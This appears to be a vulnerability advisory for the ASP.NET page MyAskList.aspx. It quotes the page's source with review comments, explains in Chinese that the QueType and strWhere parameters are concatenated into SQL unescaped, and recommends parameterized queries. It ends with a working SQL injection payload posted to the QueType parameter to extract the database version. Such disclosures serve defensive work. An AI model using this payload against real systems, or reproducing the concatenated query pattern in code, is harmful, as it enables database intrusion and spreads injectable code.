<p>/Guest/ask/MyAskList.aspx</p><pre class="">protected void Page_Load(object sender, EventArgs e)
{
// Page load handler for /Guest/ask/MyAskList.aspx. On a non-postback request it builds a
// filter string from the login state and from request parameters, passes it to b_Ask.Sel,
// and hands the returned DataTable to Bind.
// NOTE(review): every filter below is assembled by plain string concatenation. Nothing in
// this method validates, escapes, or parameterizes the request values before they reach
// b_Ask.Sel (presumably the SQL WHERE clause - confirm against the Sel implementation).
// Mitigation: bind the values as SQL parameters, or check them against an allow-list,
// instead of concatenating them; Sel's signature is not shown here, so it may need an
// overload that accepts parameters.
string str = "";
if (!base.IsPostBack)
{
DataTable table;
if (this.b_User.CheckLogin())
{
this.user.Text = this.b_User.GetLogin().UserName;
string userName = this.b_User.GetLogin().UserName;
// Extra condition that excludes the logged-in user's own rows.
// NOTE(review): userName is concatenated unescaped; if account names may contain a
// single quote this is a stored (second-order) injection point - confirm the
// registration rules.
str = " And UserName<>'" + userName + "'";
}
// Request[key] looks the key up in the query string, form fields, cookies and server
// variables, so the value is caller-controlled whatever the HTTP method.
if (!string.IsNullOrEmpty(base.Request["strWhere"]))
{
// Untrusted strWhere is placed inside a quoted LIKE pattern with no escaping: injectable.
// NOTE(review): the sort argument reads " AddTim e desc" here while the other branches
// use " AddTime desc"; probably an extraction artifact of this listing - confirm.
table = this.b_Ask.Sel("Qcontent LIKE '%" + base.Request["strWhere"] + "%'" + str + " And Status=1", " AddTim e desc");
}
// The IsNullOrEmpty(strWhere) test is redundant here: this branch is only reached when
// the previous condition was false.
else if (string.IsNullOrEmpty(base.Request["strWhere"]) && !string.IsNullOrEmpty(base.Request["QueType"]))
{
// Same pattern with QueType: the raw request value is concatenated into the LIKE clause.
table = this.b_Ask.Sel("QueType LIKE '%" + base.Request["QueType"] + "%' " + str + " And Status=1", " AddTime desc");
}
else
{
// No request filter: only the status condition plus the optional user exclusion.
table = this.b_Ask.Sel("Status=1 " + str, " AddTime desc");
}
string str3 = "";
string item = "";
IList<string> list = new List<string>();
Repeater repeater = new Repeater();
if (table != null)
{
foreach (DataRow row in table.Rows)
{
// str3 is never assigned after its initialisation, so this condition is always true
// and every row's Qcontent is collected.
if (string.IsNullOrEmpty(str3))
{
item = row["Qcontent"].ToString();
list.Add(item);
}
}
}
// The Repeater is a local created above and is not attached to any control within this
// method, so the effect of this data binding is not visible from here.
repeater.DataSource = list;
repeater.DataBind();
if (table != null)
{
this.Bind(table);
}
if (table != null)
{
table.Dispose();
}
list.Clear();
}
}
</pre><p>table = this.b_Ask.Sel("QueType LIKE '%" + base.Request["QueType"] + "%' " + str + " And Status=1", " AddTime desc");</p><p>这里 QueType 参数同样未经任何处理,直接拼接进 SQL 语句传入数据库,导致 SQL 注入。同一方法中的 strWhere 参数也是以相同方式拼接的。修复时应改用参数化查询传值,而不是把 Request 参数直接拼接进查询条件。</p><p><br></p><p><br></p><p>漏洞利用过程</p><p>访问</p><p><a href="http://xxx.com/Guest/ask/" rel="nofollow">http://xxx.com/Guest/ask/</a>MyAskList.aspx</p><p>post提交</p><p>QueType='and (select @@version)>0 and '%'=' </p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434685163694-1.png" data-image-size="865,701"><br></p>